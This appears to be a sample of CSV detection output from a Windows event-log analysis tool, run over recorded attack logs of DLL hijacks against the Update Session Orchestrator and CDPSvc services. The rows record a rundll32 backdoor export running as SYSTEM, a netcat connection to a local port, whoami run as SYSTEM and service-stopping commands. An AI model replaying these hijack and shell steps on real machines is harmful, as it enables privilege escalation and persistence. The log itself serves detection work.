+2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.218 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.224 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.230 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.232 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.242 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.247 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.255 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.388 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.401 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.425 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.434 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.440 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.451 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.463 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.485 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.486 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.513 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.542 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:25.569 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 3364 | PGUID: 747F3D96-9F77-5E75-0000-0010D2E62000 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | LID: 0x3e7 | PID: 2416 | PGUID: 747F3D96-9F77-5E75-0000-001090F32000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:40.502 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49674 (MSEDGEWIN10) | Dst: 127.0.0.1:1337 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\rundll32.exe | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 2484 | PGUID: 747F3D96-9F7D-5E75-0000-00104E062100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4680 | PGUID: 747F3D96-9F86-5E75-0000-00101A9F2100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc stop CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 4876 | PGUID: 747F3D96-0A17-5E76-0000-001062373A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc query CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 1236 | PGUID: 747F3D96-0A1F-5E76-0000-0010375C3A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
